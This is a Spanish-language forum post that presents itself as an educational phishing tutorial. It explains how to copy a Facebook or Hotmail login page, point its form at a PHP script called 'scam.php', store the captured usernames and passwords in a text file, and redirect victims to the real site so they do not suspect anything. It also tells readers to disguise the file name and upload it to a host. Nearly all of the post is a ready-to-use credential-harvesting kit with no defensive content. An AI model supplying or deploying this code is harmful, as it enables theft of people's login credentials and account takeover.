Phishing básico, con fines educativos

Escrito por Argoslord hace 8 meses bajo Dominio Público

Bien como venia explicando en el resumen este Phishing es con fines educativos para que cuando naveguen la red esten atentos y no caigan facil...

Bueno lo primero que haremos es ir a la web que queremos hacer, ejemplo: Facebook - Hotmail. de ahi buscamos y guardamos la web de login, para guardarla solo vamos a Archivo -> Guardar Como.

Una ves guardada la buscamos y la abrimos con el block de notas.

Ahora nos fijamos en donde esta el form de entrada, y buscamos el action:

Código:

<b><form action="http:///login.php" method="post"><table>
<tbody><tr><td>Login:</td><td><input name="login" type="text"></td></tr><tr><td>Password:</td><td><input name="password" type="password"></td></tr> </b>

¡ Mucho ojo a lo que puse en negrilla !

Una ves que encontramos esto, le cambiamos el form action por un PHP que crearemos despues. Quedaria asi:

Código:

<b><form action="scam.php" method="post"><table>
<tbody><tr><td>Login:</td><td><input name="login" type="text"></td></tr><tr><td>Password:</td><td><input name="password" type="password"></td></tr> </b>

Obviamente vamos a ponerle un nombre que no sea tan obvio, como por ejemplo login.php

Ahora, pasemos a crear el archivo scam.php:

Código:

<b><html>
<head>
<title> Login </title>
</head>
<body>
<?
$login=htmlentities($_POST['login']);
$pass=htmlentities($_POST['password']);
$guardame=fopen("almacenados.txt", a);
fwrite ($guardame,"
".$login."
".$pass);
Fclose($guardame)
?>
<META HTTP-EQUIV='refresh' CONTENT='1;url=http://www.lapaginaoriginal.com/'>
</body>
</html> </b>

Ahora pasare a explicar el codigo PHP para que entiendan un poco mejor el funcionamiento.

<b>$login=htmlentities($_POST['login']); </b>

en la parte de ['login'] tiene que ser lo que remarque con negrita antes.. que dije que se fijaran bien, lo de $_POST es porque el form method es en POST

<b>$pass=htmlentities($_POST['password'])</b>;

Lo mismo que lo anterior...

<b>$guardame=fopen("almacenados.txt", a);</b>

Crea el directorio almacenados.txt

<b>fwrite ($guardame,"
".$login."
".$pass);
Fclose($guardame) </b>

Escribe en almacenados.txt los datos de $login y $pass (que seria el user y pass introducido)

<b><META HTTP-EQUIV='refresh' CONTENT='1;url=http://www.lapaginaoriginal.com/'> </b>

Redireccionamos para que no sospechen.

Para ver los users y pass vamos al archivo almacenados.txt, todo lo subimos a un host, obviamente
Espero que les haya gustado, es algo basica la guia pero en fin... lo que se es poquito pero sustancioso.
Saludos!

fuente: http://es.debugmodeon.com/articulo/phishing-basico